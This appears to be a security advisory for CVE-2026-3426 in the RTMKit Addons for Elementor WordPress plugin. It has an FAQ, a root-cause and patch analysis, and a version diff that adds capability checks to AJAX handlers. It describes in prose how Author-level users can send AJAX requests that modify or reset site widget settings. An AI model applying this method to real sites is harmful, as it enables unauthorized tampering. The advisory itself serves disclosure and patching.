What is CVE-2026-3426?

CVE-2026-3426 is a vulnerability in the RTMKit Addons for Elementor plugin for WordPress, affecting versions up to and including 2.0.2. It allows authenticated users with Author-level access to modify or reset site-wide widget configurations due to missing authorization checks in specific AJAX handler functions.

How does the vulnerability work?

The vulnerability arises from the save_widget() and reset_all_widgets() functions, which do not verify user capabilities beyond checking for a valid nonce. This allows authenticated attackers to send AJAX requests that can alter widget settings without proper permissions.

Who is affected by this vulnerability?

Any WordPress site using the RTMKit Addons for Elementor plugin version 2.0.2 or earlier is affected. Specifically, users with Author-level access can exploit this vulnerability to modify widget configurations.

How can I check if my site is vulnerable?

Check the version of the RTMKit Addons for Elementor plugin installed on your WordPress site. If it is version 2.0.2 or earlier, your site is vulnerable. Additionally, review user roles to identify if any Author-level users have access.

How can I fix this vulnerability?

To fix CVE-2026-3426, update the RTMKit Addons for Elementor plugin to version 2.0.3 or later, where the vulnerability has been patched. This version includes necessary capability checks to prevent unauthorized modifications.

What are the risks associated with this vulnerability?

The risk level is classified as Medium, with a CVSS score of 4.3. Successful exploitation can lead to unauthorized changes to site-wide widget configurations, potentially disrupting site functionality and allowing attackers to inject malicious content.

What does the CVSS score mean in practical terms?

A CVSS score of 4.3 indicates a medium severity vulnerability, suggesting that while it is not the most critical issue, it still poses a significant threat. Administrators should prioritize addressing it to maintain site integrity and security.

How does the proof of concept demonstrate the issue?

The proof of concept provided outlines a method for authenticated users to exploit the vulnerability by sending crafted AJAX requests to the WordPress admin-ajax.php endpoint. It illustrates how an attacker can modify widget settings without proper authorization.

What steps can I take to mitigate this vulnerability if I cannot update immediately?

If immediate updates are not possible, consider restricting Author-level access or monitoring AJAX requests for suspicious activity. Additionally, review user roles and permissions to limit the potential for exploitation.

What should I do if I suspect my site has been compromised?

If you suspect exploitation of this vulnerability, immediately review your site’s logs for unauthorized changes, reset affected widget configurations, and update the plugin. Conduct a security audit to ensure no further vulnerabilities exist.

Can this vulnerability affect other plugins or themes?

CVE-2026-3426 is specific to the RTMKit Addons for Elementor plugin and does not directly affect other plugins or themes. However, the underlying issue of insufficient authorization checks can be a common vulnerability pattern across various WordPress components.

Where can I find more information about this vulnerability?

For more information about CVE-2026-3426, refer to the official CVE database or security advisories from WordPress security organizations. Additionally, the plugin’s changelog and support forums may provide updates and community insights.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 12, 2026

CVE-2026-3426: RTMKit Addons for Elementor <= 2.0.2 – Authenticated (Author+) Missing Authorization to Widget Configuration Modification (rometheme-for-elementor)

CVE ID CVE-2026-3426

Plugin rometheme-for-elementor

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.0.2

Patched Version 2.0.3

Disclosed May 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3426:
This vulnerability allows authenticated attackers with Author-level access to modify or reset site-wide widget configurations in the RTMKit Addons for Elementor plugin, versions up to and including 2.0.2. The issue stems from missing authorization checks in two AJAX handler functions, making unauthorized data modification possible.

Root Cause:
The vulnerability exists in the file rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php. The save_widget() function (line 182) and reset_all_widgets() function (line 280) both register as WordPress AJAX handlers but lack capability checks. Each function only validates a nonce via check_ajax_referer(‘rtmkit_nonce’, ‘nonce’), which confirms the request came from an authenticated user but does not verify the user’s role or permissions. An attacker with Author-level access (who possesses AJAX nonces) can call these functions without the required ‘manage_options’ capability.

Exploitation:
Attackers can exploit this by sending authenticated AJAX POST requests to /wp-admin/admin-ajax.php with the action parameter set to the relevant handler. For save_widget(), the WordPress action hook is ‘wp_ajax_save_widget’. The attacker sends JSON payloads via the request body containing key-value pairs of widget settings they wish to modify. For reset_all_widgets(), the action is ‘wp_ajax_reset_all_widgets’, requiring no additional parameters. In both cases, the nonce parameter must be included with a valid authenticated nonce, which Author-level users can obtain from the WordPress admin interface.

Patch Analysis:
The patch adds capability checks using current_user_can(‘manage_options’) at the beginning of both functions, before any processing occurs. In save_widget() (line 185), the check denies access and terminates execution if the user lacks administrator privileges. Similarly, in reset_all_widgets() (line 288), the same check is applied. This ensures only users with the ‘manage_options’ capability (typically administrators) can modify or reset widget configurations.

Impact:
Successful exploitation allows an authenticated attacker with Author-level access to arbitrarily modify or completely reset all site-wide widget configurations. This could disable critical widgets, replace them with malicious content, or disrupt the site’s appearance and functionality. The ‘reset’ function is particularly damaging as it destroys all saved widget settings across the entire site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -37,6 +37,12 @@
         // Load the sidebar view file

         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
             wp_send_json_error('Sidebar view file not found.');
             return;
@@ -50,15 +56,23 @@
     public function get_content()
     {
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+        $path = sanitize_text_field($_POST['path']);
+        $menus = RTMKitModulesMenu::instance()->get_menu_by_path($_POST['path']);

         if (!isset($_POST['path'])) {
             wp_send_json_error('Path not specified.');
             return;
         }
-        $path = sanitize_text_field($_POST['path']);
-        $file = RTM_KIT_DIR . 'views/' . $path . '.php';
-        if (!file_exists($file)) {
-            return '';
+
+        if (isset($menus['render_view']) && file_exists($menus['render_view'])) {
+            $file = $menus['render_view'];
+        } else {
+            wp_send_json_error('View file not found for the specified path.');
+            return;
         }
         ob_start();
         require_once $file;
--- a/rometheme-for-elementor/Inc/Elements/PricingTable.php
+++ b/rometheme-for-elementor/Inc/Elements/PricingTable.php
@@ -24,8 +24,7 @@
         $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
         return $icon;
     }
-
-
+
     public function get_categories()
     {
         return ['romethemekit_widgets'];
--- a/rometheme-for-elementor/Inc/Elements/SocialIcon.php
+++ b/rometheme-for-elementor/Inc/Elements/SocialIcon.php
@@ -74,9 +74,9 @@
                 'pointer-on-hover' => esc_html('Pointer On Hover'),
             ],
             'default' => 'flat',
-            'condition' => [
-                'select_color' => 'official'
-            ]
+            // 'condition' => [
+            //     'select_color' => 'official'
+            // ]
         ]);

         $ss = new ElementorRepeater();
@@ -472,6 +472,17 @@
             ]
         ]);

+         $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
@@ -522,6 +533,17 @@
             ]
         ]);

+        $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link:hover' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
--- a/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
+++ b/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
@@ -26,23 +26,34 @@
             add_action('wp_ajax_get_installed_templates', [$this, 'get_installed_templates']);
             add_action('wp_ajax_get_installed_template', [$this, 'get_installed_template']);
             add_action('wp_ajax_get_template_content', [$this, 'get_template_content']);
-            add_action('wp_ajax_is_pro_active' , [$this , 'is_pro_active']);
+            add_action('wp_ajax_is_pro_active', [$this, 'is_pro_active']);
         }
     }

-    public function is_pro_active() {
-        check_ajax_referer('rtmkit_nonce' , 'nonce');
+    public function is_pro_active()
+    {
+        check_ajax_referer('rtmkit_nonce', 'nonce');

         wp_send_json_success(RTMKitCorePlugin::instance()->pro_is_active());
     }

     public function template_category()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->get_template_categories());
     }

     public function fetch_lib()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->_get_template_data('templatekits'));
     }

--- a/rometheme-for-elementor/Inc/Modules/Menu.php
+++ b/rometheme-for-elementor/Inc/Modules/Menu.php
@@ -42,6 +42,7 @@
                     'function' => [$this, 'rtmkit_root_page'],
                     'icon_url' => RTM_KIT_URL . 'assets/images/romethemekit.svg',
                     'position' => 20,
+                    'render_view' => RTM_KIT_DIR . 'views/dashboard.php',
                 ],
             ],

@@ -51,60 +52,69 @@
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=widgets',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/widgets.php',
                 ],
                 'modules' => [
                     'title' => __('Modules', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=modules',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/modules.php',
                 ],
                 'themebuilder' => [
                     'title' => __('Theme Builder', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=themebuilder',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/themebuilder.php',
                 ],
                 'templates' => [
                     'title' => __('Template Kits', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=templates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/templates.php',
                 ],
             ],

             'settings' => [
-                'settings' => [
+                'global-kit-setup' => [
                     'title' => __('Global Kit Setup', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
-                    'menu_slug' => 'rtmkit&path=settings',
+                    'menu_slug' => 'rtmkit&path=global-kit-setup',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/settings.php',
                 ],
                 'updates' => [
                     'title' => __('Version Controls', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=updates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/updates.php',
                 ],
             ],

             'information' => [
                 'submission' => [
-                    'title' => __('Submission', 'rometheme-for-elementor'),
+                    'title' => __('Submissions', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=submission',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/submission.php',
                 ],
                 'system-status' => [
                     'title' => __('System Info', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=system-status',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/system-status.php',
                 ],
                 'documentation' => [
                     'title' => __('Help & Center', 'rometheme-for-elementor'),
                     'capability' => 'read',
                     'menu_slug' => 'rtmkit&path=help',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/help.php',
                 ],
             ],
         ];
@@ -235,7 +245,7 @@
         $wp_admin_bar->add_node([
             'id' => 'rtmkit_submission',
             'parent' => 'rtmkit_menu_bar',
-            'title' => 'Submission',
+            'title' => 'Submissions',
             'href' => admin_url('admin.php?page=rtmkit&path=submission'),
         ]);

@@ -369,4 +379,31 @@
             wp_enqueue_script('rtmkit-new-features', RTM_KIT_URL . 'assets/js/rtmkit-new-feature.js', [], RTM_KIT_VERSION, true);
         }
     }
+
+    protected function findByKey(array $array, string $searchKey)
+    {
+        foreach ($array as $key => $value) {
+
+            // Kalau key ketemu
+            if ($key === $searchKey) {
+                return $value;
+            }
+
+            // Kalau value masih array, lanjut cari ke dalam
+            if (is_array($value)) {
+                $result = $this->findByKey($value, $searchKey);
+                if ($result !== null) {
+                    return $result;
+                }
+            }
+        }
+
+        return null;
+    }
+
+    public function get_menu_by_path(string $path)
+    {
+        $menus = $this->get_menus();
+        return $this->findByKey($menus, $path);
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
@@ -20,6 +20,7 @@
             add_action('wp_ajax_get_themebuilder_table', [$this, 'get_themebuilder_table']);
             add_action('wp_ajax_add_themebuilder', [$this, 'add_themebuilder']);
             add_action('wp_ajax_edit_themebuilder', [$this, 'edit_themebuilder']);
+            add_action('wp_ajax_install_requirements', [$this, 'install_requirements']);
         }
     }

@@ -126,4 +127,46 @@
             wp_send_json_error('Failed Save Template');
         }
     }
+
+    public function install_requirements()
+    {
+        if (!current_user_can('manage_options')) {
+            wp_die();
+        }
+
+         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        include_once ABSPATH . 'wp-admin/includes/plugin.php';
+        include_once ABSPATH . 'wp-admin/includes/file.php';
+        include_once ABSPATH . 'wp-admin/includes/misc.php';
+        include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
+
+        $plugin = $_POST['plugin'];
+        $plugin_file = WP_PLUGIN_DIR . '/' . $plugin;
+        $plugin_slug = dirname($plugin);
+
+        if (file_exists($plugin_file)) {
+            // Activate the plugin if already installed but inactive
+            ob_start();
+            activate_plugin($plugin);
+            ob_clean();
+            ob_end_clean();
+            wp_send_json_success("Install and Activate Successfully");
+        } else {
+            ob_start();
+            $plugin_download_url = "https://downloads.wordpress.org/plugin/{$plugin_slug}.latest-stable.zip"; // Adjust URL structure
+            $upgrader = new Plugin_Upgrader();
+            $result = $upgrader->install($plugin_download_url);
+
+            if (is_wp_error($result)) {
+                wp_send_json_error();
+            }
+            $activate_result = activate_plugin($plugin);
+            if (is_wp_error($activate_result)) {
+                wp_send_json_error('Plugin installed but failed to activate: ' . $activate_result->get_error_message());
+            }
+
+            wp_send_json_success('Plugin installed and activated successfully.');
+        }
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
@@ -113,11 +113,9 @@
             return true;
         }

-        // Pastikan struktur include/exclude ada
         $includes = isset($conditions['include']) ? (array) $conditions['include'] : [];
         $excludes = isset($conditions['exclude']) ? (array) $conditions['exclude'] : [];

-        // 🔹 Helper function: cek apakah kondisi cocok
         $match_condition = function ($cond) {

             if (empty($cond['page'])) {
@@ -127,124 +125,224 @@
             $page = $cond['page'];
             $sub  = isset($cond['sub']) ? $cond['sub'] : [];

-            // === 🔸 ENTIRE SITE ===
+            $normalize = function ($val) {
+                if ($val === true || $val === null || $val === '') {
+                    return [true];
+                }
+                return is_array($val) ? $val : [$val];
+            };
+
+            // ===== ENTIRE =====
             if ($page === 'entire') {
                 return true;
             }

-            // === 🔸 ARCHIVES ===
+            // ===== ARCHIVES =====
             if ($page === 'archives' && (is_archive() || is_home())) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'author':
-                            if (is_author($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_author($v)) return true;
+                            }
                             break;
+
                         case 'search':
                             if (is_search()) return true;
                             break;
+
                         case 'post_archive':
                             if (is_home()) return true;
                             break;
+
                         case 'categories':
-                            if (is_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_category($v)) return true;
+                            }
                             break;
+
                         case 'tags':
-                            if (is_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_tag($v)) return true;
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 SINGULAR ===
+            // ===== SINGULAR =====
             if ($page === 'singular' && is_singular()) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'front_page':
                             if (is_front_page() || (is_home() && !is_paged())) return true;
                             break;

                         case 'posts':
-                            if (get_post_type() === 'post' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'post') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'pages':
-                            if (get_post_type() === 'page' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'page') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'post_category':
-                            if (is_single() && has_category($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_category($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_tag':
-                            if (is_single() && has_tag($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_tag($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_author':
-                            if (is_single() && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'page_author':
-                            if (is_page() && get_post_field('post_author', get_the_ID()) == $val) return true;
-                            break;
-                        case 'author':
-                            if (is_author($val)) return true;
+                            if (is_page()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 WOO ===
+            // ===== WOOCOMMERCE =====
             if ($page === 'woocommerce' && function_exists('is_woocommerce')) {
+
                 if (empty($sub)) return is_woocommerce();

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'shop':
                             if (is_shop()) return true;
                             break;
+
                         case 'product_archive':
                             if (is_post_type_archive('product')) return true;
                             break;
+
                         case 'single_product':
-                            if (is_product() && (empty($val) || get_the_ID() == $val)) return true;
+                            if (is_product()) {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'product_categories':
-                            if (is_product_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_category($v)) return true;
+                            }
                             break;
+
                         case 'product_tags':
-                            if (is_product_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_tag($v)) return true;
+                            }
                             break;
+
                         case 'product_author':
-                            if (is_singular('product') && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_singular('product')) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }
-            // === 🔸 404 ===
+
+            // ===== 404 =====
             if ($page === 'error_404' && is_404()) {
                 return true;
             }

             return false;
         };
-        // 🔹 Jika ada kondisi EXCLUDE yang cocok → langsung FALSE
-        foreach ($excludes as $cond) {
-            if ($match_condition($cond)) {
+
+        // ===== INCLUDE FIRST =====
+        if (!empty($includes)) {
+
+            $includeMatched = false;
+
+            foreach ($includes as $cond) {
+                if ($match_condition($cond)) {
+                    $includeMatched = true;
+                    break;
+                }
+            }
+
+            if (!$includeMatched) {
                 return false;
             }
+
+            // jika include match, cek exclude
+            foreach ($excludes as $cond) {
+                if ($match_condition($cond)) {
+                    return false;
+                }
+            }
+
+            return true;
         }
-        // 🔹 Jika ada kondisi INCLUDE yang cocok → TRUE
-        foreach ($includes as $cond) {
+
+        // ===== ONLY EXCLUDE =====
+        foreach ($excludes as $cond) {
             if ($match_condition($cond)) {
-                return true;
+                return false;
             }
         }
+
         return true;
     }
-
+
     public function load_themebuilder()
     {
         $active_themebuilder = RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_active_themebuilder();
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
@@ -19,6 +19,7 @@
         RTMKitModulesWidgetsWidgetStorage::instance()->init();
         add_action('elementor/elements/categories_registered', [$this, 'add_elementor_widget_categories']);
         add_action('wp_enqueue_scripts', [$this, 'enqueue_widget_style'], 1);
+        add_action('elementor/editor/before_enqueue_scripts', [$this, 'pro_js']);
         new RTMKitModulesHelperSavedTemplateEditor();
     }

@@ -142,4 +143,17 @@
 <?php
         }
     }
+
+    function pro_js()
+    {
+        $list_widgets_pro = RTMKitModulesWidgetsWidgetStorage::instance()->get_widget_data("pro");
+
+        if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+            wp_enqueue_script('rtmprojs', RTM_KIT_URL . 'assets/js/rtmwp.js', ['jquery' , 'wp-i18n'], RTM_KIT_VERSION, true);
+            wp_localize_script('rtmprojs', 'rtmpro', [
+                'is_pro' =>  RTMKitCorePlugin::instance()->pro_is_active() ? 'true' : 'false',
+                'widgets' => $list_widgets_pro
+            ]);
+        }
+    }
 }
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
@@ -182,6 +182,11 @@
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');

+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         // Ambil body JSON
         $rawInput = file_get_contents('php://input');
         $dataJson = json_decode($rawInput, true);
@@ -280,6 +285,10 @@
     {
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }

         delete_option('rkit-widget-options');

--- a/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
+++ b/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
@@ -77,7 +77,7 @@
                         RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_themebuilder_content($header_id)
                     );
                 echo $fullHeader;
-                break;
+                // break;
             }
         }
     }
--- a/rometheme-for-elementor/RomeTheme.php
+++ b/rometheme-for-elementor/RomeTheme.php
@@ -3,20 +3,20 @@
 /**
  * Plugin Name:       RTMKit Addons for Elementor
  * Description:      The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
- * Version:           2.0.2
+ * Version:           2.0.3
  * Author:            Rometheme
  * Author URI: 	  	  https://rometheme.net/
  * License : 		  GPLv3 or later
  * Requires Plugins : elementor
- * Elementor tested up to: 3.30.2
- * Elementor Pro tested up to: 3.30.0
+ * Elementor tested up to: 3.35.0
+ * Elementor Pro tested up to: 3.35.0
  * Text Domain:      rometheme-for-elementor
  * The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
  */
 if (!defined('ABSPATH')) {
     exit; // Exit if accessed directly
 }
-defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.2');
+defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.3');
 defined('RTM_KIT_DIR') || define('RTM_KIT_DIR', plugin_dir_path(__FILE__));
 defined('RTM_KIT_URL') || define('RTM_KIT_URL', plugin_dir_url(__FILE__));
 defined('RTM_KIT_FILE') || define('RTM_KIT_FILE', __FILE__);
--- a/rometheme-for-elementor/views/dashboard.php
+++ b/rometheme-for-elementor/views/dashboard.php
@@ -91,10 +91,10 @@
                     </div>
                 </div>
                 <div class="col-sm-5 col-md-5 col-lg-5 col-xl-5 col-4 col-xxl-4">
-                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-2 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
-                        <span class="accent-color fs-5">UPGRADE TO PRO</span>
-                        <h1 class="m-0 fw-light fs-1 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-1 lh-1 text-white">Hi-End Power</span></h1>
-                        <span class="text-white">
+                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-4 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
+                        <h4 class="accent-color fs-6">UPGRADE TO PRO</h4>
+                        <h1 class="m-0 fw-light fs-2 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-2 lh-1 text-white">Hi-End Power</span></h1>
+                        <span class="text-white px-2">
                             Unlock the full power of your workflow. Access 70+ widgets, 25+ templates, 9 theme builder features, 1200+ icons, extensions, and priority support. Only in RTMkit Pro.
                         </span>
                         <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent fw-bold align-items-center gap-2">
--- a/rometheme-for-elementor/views/installed_templates.php
+++ b/rometheme-for-elementor/views/installed_templates.php
@@ -109,7 +109,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
@@ -151,7 +151,6 @@
                                 <path d="M17.3837 9.26905C17.3933 9.2457 17.3989 9.22152 17.4059 9.19761C17.4118 9.17764 17.4194 9.15852 17.4236 9.13798C17.4321 9.09636 17.4357 9.05389 17.4366 9.0117C17.4366 9.00805 17.4377 9.00439 17.4377 9.00073C17.4377 8.95461 17.4329 8.9082 17.4239 8.86264C17.4197 8.84183 17.4118 8.82242 17.4059 8.80217C17.3989 8.77855 17.3936 8.75464 17.384 8.73158C17.3739 8.70739 17.3601 8.68517 17.3474 8.66239C17.3379 8.64523 17.3306 8.62723 17.3193 8.61064C17.2934 8.57183 17.2642 8.53583 17.2316 8.5032L10.9614 2.23245C10.6869 1.95767 10.2414 1.95767 9.96714 2.23245C9.69236 2.50695 9.69236 2.95217 9.96714 3.22667L15.0356 8.29536L1.26668 8.2827H1.26611C0.87827 8.2827 0.56327 8.59714 0.562988 8.98527C0.562707 9.37367 0.877145 9.68867 1.26555 9.68895L15.0389 9.70161L9.96743 14.7734C9.69264 15.0479 9.69264 15.4931 9.96743 15.7676C10.1047 15.9049 10.2847 15.9735 10.4647 15.9735C10.6447 15.9735 10.8247 15.9049 10.9619 15.7676L17.2318 9.4977C17.2647 9.46508 17.294 9.4288 17.3199 9.38998C17.3317 9.37255 17.3396 9.3537 17.3497 9.33542C17.3618 9.31348 17.375 9.29239 17.3846 9.26905H17.3837Z" fill="currentColor" />
                             </svg>
                             Import</button>
-
                     </div>
                 </div>
             </div>
@@ -188,7 +187,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
